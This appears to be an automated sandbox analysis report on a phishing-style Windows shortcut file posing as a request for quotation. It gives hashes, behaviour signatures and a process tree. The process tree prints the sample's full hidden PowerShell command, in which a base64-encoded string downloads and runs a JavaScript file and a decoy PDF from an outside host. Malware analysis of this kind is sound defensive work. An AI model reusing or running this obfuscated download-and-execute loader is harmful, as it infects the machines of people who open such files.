Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    16-11-2024 05:07

General

  • Target

    Saturday Nov 16 RFQ 120HQ.lnk

  • Size

    215KB

  • MD5

    614423a0f5b8a21a0ae2d957b46cef3c

  • SHA1

    529c5271a1b4cef778dc48b2dd6edfeddd24c38c

  • SHA256

    506db308fda3797a3474eab41654ba925cd3ba3582f638b92400ba3767294de6

  • SHA512

    6dd13c5927b99c804e20ed0412d7279c40ddbce7c626e536c2d4a11e6455203c82780db5d53fda5552fdf590633c76e83c0c6aaaf83e3c2d528e9e5a59298af4

  • SSDEEP

    6144:M+HZ4aKBKefy7xCfE2CQT7FSwehrQWatIJEr0a6NQ:M+mGwy70fHCQThS9Z2aaMQ

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Saturday Nov 16 RFQ 120HQ.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$6VcZuEYj = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC93VkVQei5wZGYgLU91dEZpbGUgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvdHdCa1guanMgLU91dEZpbGUgJGVudjpURU1QXGFVSXFLcC5qcztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxhVUlxS3AuanM7JGNsPSdNU093U0YnOyRjbD0nTVNPd1NGJztFeGl0';$ZSr2rv13TMa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($6VcZuEYj));Invoke-Expression -Command $ZSr2rv13TMa"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2764

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2764-38-0x000007FEF651E000-0x000007FEF651F000-memory.dmp

    Filesize

    4KB

  • memory/2764-39-0x000000001B290000-0x000000001B572000-memory.dmp

    Filesize

    2.9MB

  • memory/2764-40-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2764-42-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2764-41-0x00000000024E0000-0x00000000024E8000-memory.dmp

    Filesize

    32KB

  • memory/2764-43-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2764-44-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2764-45-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2764-46-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB